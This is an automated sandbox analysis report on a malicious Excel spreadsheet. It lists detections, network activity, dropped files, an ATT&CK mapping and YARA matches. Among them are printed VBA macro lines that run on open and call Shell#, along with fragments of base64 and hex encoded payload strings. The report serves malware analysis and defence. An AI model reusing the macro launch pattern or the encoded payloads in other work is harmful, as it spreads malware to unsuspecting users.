Loading ...

Analysis Report XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls

Overview

General Information

Joe Sandbox Version:25.0.0 Tiger's Eye
Analysis ID:800718
Start date:28.02.2019
Start time:14:44:05
Joe Sandbox Product:Cloud
Overall analysis duration:0h 6m 56s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xls
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:17
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • GSI enabled (VBA)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal88.troj.expl.evad.winXLS@25/38@6/3
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .xls
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe, csc.exe, powershell.exe, powershell.exe, csc.exe, csc.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold880 - 100Report FP / FNfalsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsCommand-Line Interface21Winlogon Helper DLLProcess Injection1Disabling Security Tools11Credential DumpingProcess Discovery1Application Deployment SoftwareData from Local SystemData Encrypted1Standard Non-Application Layer Protocol2
Replication Through Removable MediaPowerShell2Port MonitorsAccessibility FeaturesProcess Injection1Network SniffingSecurity Software Discovery1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumStandard Application Layer Protocol2
Drive-by CompromiseScripting32Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureRemote System Discovery1Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationExploitation for Client Execution13System FirmwareDLL Search Order HijackingScripting32Credentials in FilesSystem Network Configuration Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasqueradingAccount ManipulationFile and Directory Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceDLL Search Order HijackingBrute ForceSystem Information Discovery21Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus detection for submitted fileShow sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsAvira: Label: X97M/Agent.1199011

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exeJump to behavior
Potential document exploit detected (performs DNS queries)Show sources
Source: global trafficDNS query: name: i.imgur.com
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49224 -> 151.101.36.193:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49224 -> 151.101.36.193:443

Networking:

barindex
May check the online IP address of the machineShow sources
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
Source: unknownDNS query: name: ipinfo.io
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 151.101.36.193 151.101.36.193
Source: Joe Sandbox ViewIP Address: 216.239.34.21 216.239.34.21
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox ViewIP Address: 216.239.32.21 216.239.32.21
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
JA3 SSL client fingerprint seen in connection with other malwareShow sources
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSOJump to behavior
Found strings which match to known social media urlsShow sources
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: i.imgur.com
Urls found in memory or binary dataShow sources
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmpString found in binary or memory: http://apps.identrust.com
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://cps.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootC
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRoot
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000004.00000002.1673064105.001B7000.00000004.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabW
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.c
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.digicert.com0F
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmpString found in binary or memory: http://oi65.tinypic.com/2z8thcz.jpg
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmpString found in binary or memory: http://www.microsoft.
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmpString found in binary or memory: https://i.imgur.com
Source: powershell.exe, 00000009.00000002.1774266374.002CB000.00000004.sdmpString found in binary or memory: https://i.imgur.com/96vV0YR.png
Source: powershell.exe, 00000004.00000002.1677892164.01F3C000.00000004.sdmp, powershell.exe, 00000009.00000002.1777809726.01DFC000.00000004.sdmpString found in binary or memory: https://i.imgur.com/96vV0YR.pngH
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmpString found in binary or memory: https://ipinfo.io/country8
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmpString found in binary or memory: https://ipinfo.io/countryx
Source: powershell.exe, 00000004.00000002.1680343597.059DF000.00000004.sdmp, powershell.exe, 00000009.00000002.1783154339.05919000.00000004.sdmpString found in binary or memory: https://ipinfo.ioH
Source: powershell.exe, 00000004.00000002.1679759349.056B0000.00000004.sdmp, powershell.exe, 00000009.00000002.1782716792.05790000.00000004.sdmpString found in binary or memory: https://ipinfo.ioh%
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000004.00000002.1679178167.0450C000.00000004.sdmp, powershell.exe, 00000009.00000002.1781774531.05016000.00000004.sdmpString found in binary or memory: https://www.digicert.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49233
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49233 -> 443

E-Banking Fraud:

barindex
Drops certificate files (DER)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15AJump to dropped file

System Summary:

barindex
Document contains an embedded VBA macro with suspicious stringsShow sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsOLE, VBA macro line: If opa > xlBinsTypeBinSize * 347 - 1.07 Then ShowFormatTabs Else Application.Quit
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsOLE, VBA macro line: FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function SensetiveLine, String application.quit: Application.Quit Name: SensetiveLine
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function ShowFormatTabs, String shell#: FarWd = Shell#(StopTabs & tiga + BiS(LineCVharts, tuf), 0)Name: ShowFormatTabs
Document contains an embedded VBA with base64 encoded stringsShow sources
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function tiga, String qIYZn9Ht2um2m0iwVt4AA4ggYomdM56/MY2iQYuwNs8c4xuvFnD6gRhxnG1q+gpLTtjsMA6Ierk4kloEe6HL9aRgOh/shc1Mnu7FHFEsO7bmDBQ3LjROTzBZTBPdbbOKKsfFTWv6HTyMkmO3HbrWqGS2npvPS1OO4EXuzHuFL2FSAynlMeUPGpcwlL2fUe7pjr29kJxlQN35WaDzD29+JzgHRedSug6xirvFY0neHRMhxj9O5N7JcPYGgIEP3LKMk8LmTgce/XDbmoUFO/8wyIrGnRF49sVPlSnyPdTWIMzbrqCh83Qxwvq1sCj8Ju3p263QN4pSek6kf2K/OcggmF84+HSlJTXODz+U7XEtPNxAHDkkbJDtFTEx8Fd72gFn77dSgC7VCXjc6vHtzbJdj0GHr61Fq3dag7OcZEupjYqzWtWe1C3SYdhBpUHuC81vDyT8Cp9nCyk2jlbXjzBmlH1ORRccevKACeO99EFUUeekaN1gESmt0OuVKyQCjxZ6V5b04nqphnvlGkGdG5I6LUwrmu7aeV2svPpj8jtIsMRczxdQfCNw/dJtxb0BYnYXVk2nZfTu8LNWlN3TxDY1dcH/JabHwLKINn60byPed3XTtLlfqpvGHZYYhn3yZnwjlFPJDpLzHZkj+4ozmie5TOYCn3N3w4x+YhrCbxcePmKbHaLxh2bV8nifDlmhYOX79As7OmUQkSBB6cuUl7y6dGMcLXNcRT5P2YVxFOTpWGBdrm6V4HQo+6l0CbkOSZRS0WUvHgvVH0aKUcBmfvXhaTkgqxfH+Z2tgyLqzvqEEFBM8UlsgRYu+7jFtV9Fijsm/Eyi5MUVESxzokrwKSpaSklweDxZVVrxE2WO5KCbKGmxz79fm7qbnnx/1NFVGzHdKuJ9+q2WvY9+dptMIAvgruzohvn0GPsdc8UfVLcrqSODJ6WBL58M+pj/2He7+g846X7gfB6dTF4rnYzinSTn
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function tiga, String SZCSUSdQxNB0jSdR2jWPZ0lNFVf9pJSDfzrYs477+UuEreRSmSc0wkO5c+vNKJsKVAlN/ddPoTIX76bBsOvD5sd5aoAhu79t2Kdf7sjzWrtjtlyP4d3Gl9KW+de/687TUkuEQw5d1N5MDzRm84m2pHuNXXJiob70vQE3+KOBKFjyaGbPLbZfkL/9ks+p//+7Y//+usPv/v6y59//P1Xv/vlP+m7v3z9wzffp0+/+XP68sdvf/4mfZH/3X78In3+3+f0+XP6P
Document contains an embedded VBA with hexadecimal encoded stringsShow sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : found hex strings
Source: VBA code instrumentationOLE, VBA macro: Module ThisWorkbook, Function OwFormat, String qy5HEf0r/SDkHJhAX2b64qsEgg8K8SUQgiSiEh8MSB4E9b/b61I9O5Czsy/zTXdXrVq1qqrTT199+yl996dfvvnpn3///re//cfPP/3hU/rii+vTpzrSVdaV6rjSfK5S+1XyTPsXdX8ppadrrv1Iafunip8mfioXPrD/zYofOz5Q9nf51l9LftLF5wtfNPEdfpfWHb9bj1+Z9l/2l8V3lr0aNvVxM/Usgr2k2MzeCxZL2n0p9zXvqxb8Le9HuRUcZWDd0bw2tji4p4rnS9mL7Q8VLLqf2N9g64UL1crTJO0EH1x8lc+xMnczZcIF6+wXY2EYA3/Rc7Nj+xe3MLH6fsfSe/aCXEav2Zao16LV8jny3s4YepAW3B/dj+Fh/KftbgPus9DM20Z+JU+J9RMN9ugIiSbbe9nn58tLhVlwsIotTDyblxyEbW4r7xeETXAAem0AOU+YY2wPdhigcbdp0K9lA0SeGdj+3gJ2uGjpIT+NvtfNRgJ+sVYAYpss9UE/PHbc4pP8fA408FD4ce0fB7aXexwzrW2DAafufzxUgT+moW2r9yd5A2vivNt/sMZ2AX3CB289tt+NYNhP7vfun9el4ze9mUjZX+CXEh5c+7n+XDjbw8OuxvckWhQmFqozj9HsfTmiwNn3NtmlEOoC3dj7hAMQs/ttM++lGCTzmgM7VTTnAVg4SqrW2dbAbumIiOzeaceLXsN5qiy/XyovDmOfVj+oT8D3lJEnrM0tHapI+vgHbwwejlDg2xmi17Yt/Sr/IN4W4U0eWnzFRdhl23wSzVgRkKM7iCWGPJfjgbatHhAJAzBNogYbVczst+z3Tp6809qwmrYE/x7mIP9tIhBT3RfRwrcNb1PwFxDpNZEnoOKAu7Df55hkg2RMuYzhCkAy4gltWKn6fTQvifLCg50HErnBQYu4IYgQ/0u0Bvztp+QNkFAfZl9EQ/NvNwqIOWCMoIKpAX6FA/iiA
Powershell connects to networkShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 151.101.36.193 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 216.239.32.21 443Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 216.239.34.21 443
Very long command line foundShow sources
Source: unknownProcess created: Commandline size = 6831
Source: unknownProcess created: Commandline size = 6831
Source: unknownProcess created: Commandline size = 6831
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 6831Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 6831Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: Commandline size = 6831Jump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\2\BaseNamedObjects\Global\.net clr networking
Document contains an embedded VBA macro which executes code when the document is opened / closedShow sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsOLE, VBA macro line: Private Sub Frame1_Layout()
Source: VBA code instrumentationOLE, VBA macro: Module Sheet1, Function Frame1_LayoutName: Frame1_Layout
Document contains embedded VBA macrosShow sources
Source: XXX_YYYY_2019_2_3-e4261e92a0271d94f3f935b5e14f89c4.xlsOLE indicator, VBA macros: true
PE file does not import any functionsShow sources
Source: h2oah0u7.dll.13.drStatic PE information: No import functions for PE file found
Source: ua6j8io5.dll.5.drStatic PE information: No import functions for PE file found
Source: 3ndkwphw.dll.14.drStatic PE information: No import functions for PE file found
Reads the hosts fileShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Yara signature matchShow sources
Source: 0000000C.00000002.1774294244.00330000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1674260172.01880000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1774174716.00260000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1781857851.045C0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774152919.00260000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0000000C.00000000.1713368455.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000003.1708252755.002A8000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000003.1637989998.001DA000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.1679049173.04370000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000004.00000003.1635248316.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000003.1705531360.00010000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000009.00000002.1781647232.04430000.00000004.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 0000000C.00000002.1780389444.03EA0000.00000008.sdmp, type: MEMORYMatched rule: Embedded_PE Description = Discover embedded PE files, without relying on easily stripped/modified header strings., URL = https://github.com/InQuest/yara-rules, Author = InQuest Labs
Source: 00000009.00000002.1774181408.00287000.00000004.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
